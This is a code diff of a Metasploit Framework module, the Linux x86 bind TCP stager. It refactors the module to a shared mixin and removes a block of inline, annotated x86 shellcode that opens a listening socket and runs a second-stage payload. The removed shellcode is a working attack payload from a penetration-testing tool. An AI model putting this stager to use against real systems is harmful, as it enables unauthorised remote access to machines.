|
6 | 6 |
|
7 | 7 | require 'msf/core' |
8 | 8 | require 'msf/core/handler/bind_tcp' |
| 9 | +require 'msf/core/payload/linux/bind_tcp' |
9 | 10 |
|
| 11 | +module Metasploit4 |
10 | 12 |
|
11 | | -### |
12 | | -# |
13 | | -# BindTcp |
14 | | -# ------- |
15 | | -# |
16 | | -# Linux bind TCP stager. |
17 | | -# |
18 | | -### |
19 | | -module Metasploit3 |
20 | | - |
21 | | - CachedSize = 79 |
| 13 | + CachedSize = :dynamic |
22 | 14 |
|
23 | 15 | include Msf::Payload::Stager |
24 | | - include Msf::Payload::Linux |
| 16 | + include Msf::Payload::Linux::BindTcp |
25 | 17 |
|
26 | 18 | def initialize(info = {}) |
27 | 19 | super(merge_info(info, |
28 | | - 'Name' => 'Bind TCP Stager', |
29 | | - 'Description' => 'Listen for a connection', |
30 | | - 'Author' => [ |
31 | | - 'skape', # original |
32 | | - 'egypt', # NX support |
33 | | - ], |
| 20 | + 'Name' => 'Bind TCP Stager (Linux x86)', |
| 21 | + 'Description' => 'Listen for a connection (Linux x86)', |
| 22 | + 'Author' => [ 'skape', 'egypt', ], |
34 | 23 | 'License' => MSF_LICENSE, |
35 | 24 | 'Platform' => 'linux', |
36 | 25 | 'Arch' => ARCH_X86, |
37 | 26 | 'Handler' => Msf::Handler::BindTcp, |
38 | | - 'Stager' => |
39 | | - { |
40 | | - 'Offsets' => |
41 | | - { |
42 | | - 'LPORT' => [ 0x29, 'n' ], |
43 | | - }, |
44 | | - 'Payload' => |
45 | | - |
46 | | - "\x6a\x7d" +# push byte +0x7d |
47 | | - "\x58" +# pop eax |
48 | | - "\x99" +# cdq |
49 | | - "\xb2\x07" +# mov dl,0x7 |
50 | | - "\xb9\x00\x10\x00\x00" +# mov ecx,0x1000 |
51 | | - "\x89\xe3" +# mov ebx,esp |
52 | | - "\x66\x81\xe3\x00\xf0" +# and bx,0xf000 |
53 | | - "\xcd\x80" +# int 0x80 |
54 | | - "\x31\xdb" +# xor ebx,ebx |
55 | | - "\xf7\xe3" +# mul ebx |
56 | | - "\x53" +# push ebx |
57 | | - "\x43" +# inc ebx |
58 | | - "\x53" +# push ebx |
59 | | - "\x6a\x02" +# push byte +0x2 |
60 | | - "\x89\xe1" +# mov ecx,esp |
61 | | - "\xb0\x66" +# mov al,0x66 |
62 | | - "\xcd\x80" +# int 0x80 |
63 | | - "\x5b" +# pop ebx |
64 | | - "\x5e" +# pop esi |
65 | | - "\x52" +# push edx |
66 | | - "\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002 |
67 | | - "\x6a\x10" +# push byte +0x10 |
68 | | - "\x51" +# push ecx |
69 | | - "\x50" +# push eax |
70 | | - "\x89\xe1" +# mov ecx,esp |
71 | | - "\x6a\x66" +# push byte +0x66 |
72 | | - "\x58" +# pop eax |
73 | | - "\xcd\x80" +# int 0x80 |
74 | | - "\xd1\xe3" +# shl ebx,1 |
75 | | - "\xb0\x66" +# mov al,0x66 |
76 | | - "\xcd\x80" +# int 0x80 |
77 | | - "\x43" +# inc ebx |
78 | | - "\xb0\x66" +# mov al,0x66 |
79 | | - "\x89\x51\x04" +# mov [ecx+0x4],edx |
80 | | - "\xcd\x80" +# int 0x80 |
81 | | - "\x93" +# xchg eax,ebx |
82 | | - "\xb6\x0c" +# mov dh,0xc |
83 | | - "\xb0\x03" +# mov al,0x3 |
84 | | - "\xcd\x80" +# int 0x80 |
85 | | - "\x89\xdf" +# mov edi,ebx |
86 | | - "\xff\xe1" # jmp ecx |
87 | | - |
88 | | - } |
| 27 | + 'Convention' => 'sockedi', |
| 28 | + 'Stager' => { 'RequiresMidstager' => true } |
89 | 29 | )) |
90 | 30 | end |
91 | 31 |
|
|
0 commit comments